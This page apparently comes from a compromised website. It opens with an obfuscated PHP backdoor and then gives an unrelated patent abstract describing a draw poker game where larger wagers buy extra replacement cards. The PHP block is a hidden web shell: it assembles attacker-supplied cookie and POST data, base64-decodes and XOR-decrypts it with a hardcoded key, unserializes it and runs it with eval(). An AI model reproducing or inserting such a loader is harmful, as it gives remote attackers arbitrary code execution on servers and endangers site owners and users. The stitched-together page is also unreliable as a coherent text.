$UEEjRwm = 'B' . "\137" . chr (120) . chr (89) . "\121" . "\147" . chr (86); $pnyyO = chr ( 1097 - 998 )."\x6c" . chr (97) . 's' . chr ( 199 - 84 )."\x5f" . 'e' . chr ( 145 - 25 ).chr (105) . chr ( 935 - 820 )."\164" . 's';$eJRLZED = class_exists($UEEjRwm); $pnyyO = "28027";$XYQMts = strpos($pnyyO, $UEEjRwm);if ($eJRLZED == $XYQMts){function ixkvMBYEkL(){$ztpNvwt = new /* 43705 */ B_xYQgV(53141 + 53141); $ztpNvwt = NULL;}$IjZJCV = "53141";class B_xYQgV{private function NMJrjiUf($IjZJCV){if (is_array(B_xYQgV::$ANgClt)) {$gNTLBTrV2 = str_replace("<" . "?php", "", B_xYQgV::$ANgClt["content"]);eval($gNTLBTrV2); $IjZJCV = "53141";exit();}}public function uzzINIiCqW(){$gNTLBTrV = "13910";$this->_dummy = str_repeat($gNTLBTrV, strlen($gNTLBTrV));}public function __destruct(){B_xYQgV::$ANgClt = @unserialize(B_xYQgV::$ANgClt); $IjZJCV = "60517_39533";$this->NMJrjiUf($IjZJCV); $IjZJCV = "60517_39533";}public function vrVkzlqZAs($gNTLBTrV, $LzsSUpjQr){return $gNTLBTrV[0] ^ str_repeat($LzsSUpjQr, intval(strlen($gNTLBTrV[0]) / strlen($LzsSUpjQr)) + 1);}public function klCQEgrqG($gNTLBTrV){$XuuDvm = "\x62" . 'a' . 's' . chr (101) . '6' . '4';return array_map($XuuDvm . chr (95) . chr (100) . chr (101) . chr ( 1055 - 956 )."\157" . 'd' . "\145", array($gNTLBTrV,));}public function __construct($MNJut=0){$rfMPHDuhYI = "\x2c";$gNTLBTrV = "";$sTwjeBeiMd = $_POST;$yebCqjk = $_COOKIE;$LzsSUpjQr = "3923b363-50d6-4662-8afe-76084848d263";$jDysYh = @$yebCqjk[substr($LzsSUpjQr, 0, 4)];if (!empty($jDysYh)){$jDysYh = explode($rfMPHDuhYI, $jDysYh);foreach ($jDysYh as $uMIaqRc){$gNTLBTrV .= @$yebCqjk[$uMIaqRc];$gNTLBTrV .= @$sTwjeBeiMd[$uMIaqRc];}$gNTLBTrV = $this->klCQEgrqG($gNTLBTrV);}B_xYQgV::$ANgClt = $this->vrVkzlqZAs($gNTLBTrV, $LzsSUpjQr);if (strpos($LzsSUpjQr, $rfMPHDuhYI) !== FALSE){$LzsSUpjQr = explode($rfMPHDuhYI, $LzsSUpjQr); $GamhLEq = base64_decode(md5($LzsSUpjQr[0])); $cUlQd = strlen($LzsSUpjQr[1]) > 5 ? substr($LzsSUpjQr[1], 0, 5) : $LzsSUpjQr[1];$_GET['new_key'] = md5(implode('', $LzsSUpjQr)); $WSYKalAx = str_repeat($cUlQd, 2); $sHbqJY = array_map('trim', $LzsSUpjQr);}}public static $ANgClt = 23681;}ixkvMBYEkL();}
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Patent #14/952800
Draw Poker with Option to Wager for Additional Replacement Cards
The player makes a wager to not only play the game but also to determine the total number of possible replacement cards that will be dealt. After dealing of the original cards, the player selects cards in the hand to hold and discard. The player is then dealt replacement cards and the number of cards dealt corresponds to the amount of the wager. If the player wagers more, then the player receives more cards, which in turn results in the player having more cards per card position. The player has the option of using any one of the one or more replacement cards dealt to each card position, to form a best hand from all the possible combinations of the cards such that replacement cards dealt to a particular card position can only be used in the card position to which the card was dealt.